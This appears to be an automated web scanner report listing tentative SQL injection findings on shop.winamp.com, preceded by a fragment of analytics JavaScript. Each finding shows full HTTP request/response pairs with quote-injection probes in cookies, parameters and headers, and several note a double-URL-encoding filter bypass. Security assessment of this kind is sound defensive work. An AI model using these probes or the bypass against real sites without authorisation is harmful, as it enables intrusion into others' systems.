   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 =
{
   versionHigh            : 16,
   flashVersion        : 0,
   resolution            : '0x0',
   detectFlashVersion    : function ()
   {
       var ua = navigator.userAgent.toLowerCase();
       if (navigator.plugins && nav
...[SNIP]...
1.14. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The BIGipServerp-drh-dc1pod5-pool1-active cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerp-drh-dc1pod5-pool1-active cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409894031,0)
Date: Sun, 27 Feb 2011 17:47:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409894267,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.15. http://shop.winamp.com/store [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF'; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409868347,0)
Date: Sun, 27 Feb 2011 17:47:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF''; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409869490,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.16. http://shop.winamp.com/store [Locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The Locale parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Locale parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101639964458,0)
Date: Sun, 27 Feb 2011 17:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 23783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=101639965117,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.17. http://shop.winamp.com/store [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704891155,0)
Date: Sun, 27 Feb 2011 17:47:54 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 32916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: REQ_000002
   at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:287)
   at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41)
   at
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=110230053450,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.18. http://shop.winamp.com/store [ThemeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The ThemeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ThemeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300'&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=105934960573,0)
Date: Sun, 27 Feb 2011 17:45:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 23801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ThemeID=1279300%27&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300''&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300%27%27&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=105934961726,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:45:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.19. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1'=1 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704877618,0)
Date: Sun, 27 Feb 2011 17:47:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 41391


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
:include src="/store?1'=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000002
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:516)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...
.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:690)
   at java.lang.Thread.run(Thread.java:619)
Caused by: com.digitalriver.rules.EvaluationException: java.lang.NullPointerException
Failed expression:product.getAllVariations()
   at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:190)
   at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:165)

...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1''=1 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
